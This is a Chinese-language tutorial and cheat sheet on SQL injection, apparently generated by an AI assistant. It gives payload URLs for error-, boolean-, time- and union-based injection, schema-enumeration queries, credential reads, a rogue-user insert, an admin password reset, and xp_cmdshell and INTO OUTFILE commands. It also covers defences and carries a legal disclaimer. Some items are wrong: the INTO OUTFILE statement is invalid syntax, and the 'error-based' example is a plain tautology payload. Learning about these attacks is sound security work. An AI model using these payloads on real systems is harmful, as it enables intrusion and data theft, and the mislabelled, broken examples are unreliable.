最全的SQL注入命令及方法

封面图 • 2025-12-22 • SQL Server

SQL注入是一种常见的Web安全漏洞，攻击者通过在输入中插入恶意的SQL代码，以绕过应用程序的安全机制，从而获取、篡改或删除数据库中的数据。以下是一些常见的SQL注入方法和命令，但请注意：**这些信息仅用于学习和测试目的，未经授权的攻击行为是违法的**。

---

## 一、SQL注入的基本原理

SQL注入通常发生在应用程序未正确过滤用户输入的情况下，导致攻击者可以将恶意SQL语句注入到数据库查询中。

例如：
```sql
SELECT * FROM users WHERE username = 'admin' AND password = 'password';
```
如果用户输入：
```
' OR '1'='1
```
最终的SQL语句会变成：
```sql
SELECT * FROM users WHERE username = '' OR '1'='1' AND password = 'password';
```

---

## 二、常见SQL注入类型

### 1. **基于错误的注入（Error-based SQLi）**
通过触发数据库错误来获取信息。

**示例：**
```sql
http://example.com/page.php?id=1' OR '1'='1
```

### 2. **基于布尔的注入（Boolean-based SQLi）**
通过判断真假返回值来推断数据。

**示例：**
```sql
http://example.com/page.php?id=1 AND 1=1
http://example.com/page.php?id=1 AND 1=2
```

### 3. **基于时间的注入（Time-based SQLi）**
通过让数据库延迟响应来判断注入是否成功。

**示例（MySQL）：**
```sql
http://example.com/page.php?id=1 AND SLEEP(5)
```

### 4. **联合查询注入（Union-based SQLi）**
利用 `UNION SELECT` 来获取其他表的数据。

**示例：**
```sql
http://example.com/page.php?id=1 UNION SELECT 1,2,3
```

---

## 三、常用SQL注入命令

### 1. **获取数据库信息**
```sql
-- 获取当前数据库名
SELECT DATABASE();

-- 获取所有数据库
SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA;

-- 获取所有表名
SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA = 'database_name';

-- 获取所有列名
SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = 'table_name';
```

### 2. **读取敏感数据**
```sql
-- 查询用户表
SELECT username, password FROM users;

-- 查询特定字段
SELECT id, name, email FROM users WHERE id = 1;
```

### 3. **写入数据**
```sql
-- 插入新用户
INSERT INTO users (username, password) VALUES ('hacker', '123456');

-- 修改现有用户密码
UPDATE users SET password = 'newpass' WHERE username = 'admin';
```

### 4. **执行系统命令（高危）**
```sql
-- MySQL（需权限）
SELECT INTO OUTFILE '/tmp/evil.txt' FROM (SELECT 'malicious code') AS t;

-- Windows系统命令（需权限）
EXEC xp_cmdshell 'cmd /c echo "Hello" > C:\test.txt';
```

---

## 四、SQL注入防御方法

1. **使用参数化查询（Prepared Statements）**
   - 如：`PreparedStatement`（Java）、`PDO`（PHP）、`SqlCommand`（C#）等。

2. **输入验证与过滤**
   - 对用户输入进行严格校验，如长度、格式、字符集等。

3. **最小权限原则**
   - 数据库账户只拥有必要的权限，避免使用管理员账户。

4. **使用ORM框架**
   - 如 Django ORM、Hibernate 等，自动处理SQL注入问题。

5. **Web应用防火墙（WAF）**
   - 阻止恶意请求，如 ModSecurity。

6. **定期安全测试**
   - 使用工具如 SQLMap 进行渗透测试，发现潜在漏洞。

---

## 五、免责声明

本内容仅供教育和合法测试用途。任何未经授权的SQL注入行为均违反《中华人民共和国网络安全法》及相关法律法规，可能导致严重的法律后果。

如果你正在学习Web安全或进行渗透测试，请确保你有明确的授权，并遵守相关法律法规。

---

如果你需要更深入的学习资料或工具推荐，我可以继续为你提供帮助。